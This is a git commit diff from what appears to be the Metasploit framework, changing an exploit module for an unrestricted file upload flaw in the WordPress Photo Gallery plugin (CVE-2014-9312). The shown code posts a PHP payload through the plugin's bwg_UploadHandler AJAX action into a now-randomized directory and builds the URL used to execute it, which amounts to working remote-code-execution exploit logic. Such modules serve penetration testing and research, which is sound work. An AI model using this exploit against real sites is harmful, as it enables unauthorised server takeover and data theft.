added url and randomize upload directory

firefart · firefart · commit bce7211f8653 · 2015-02-12T22:16:37.000+01:00
diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
@@ -32,7 +32,8 @@ def initialize(info = {})
         [
           ['OSVDB', '117676'],
           ['WPVDB', '7769'],
-          ['CVE', '2014-9312']
+          ['CVE', '2014-9312'],
+          ['URL', 'http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html']
         ],
       'DisclosureDate'  => 'Nov 11 2014',
       'Platform'        => 'php',
@@ -78,11 +79,12 @@ def exploit
     payload_name = Rex::Text.rand_text_alpha(10)
     data = generate_mime_message(payload, payload_name)
 
-    print_status("#{peer} - Uploading payload...")
+    upload_dir = "#{Rex::Text.rand_text_alpha(5)}/"
+    print_status("#{peer} - Uploading payload to #{upload_dir}...")
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => wordpress_url_admin_ajax,
-      'vars_get'  => { 'action' => 'bwg_UploadHandler', 'dir' => 'rce/' },
+      'vars_get'  => { 'action' => 'bwg_UploadHandler', 'dir' => upload_dir },
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => data.to_s,
       'cookie'    => cookie
@@ -100,7 +102,7 @@ def exploit
       else
         uploaded_name = json['files'][0]['name'][0..-5]
         php_file_name = "#{uploaded_name}.php"
-        payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
+        payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name)
         print_good("#{peer} - Parsed response")
 
         register_files_for_cleanup(php_file_name)
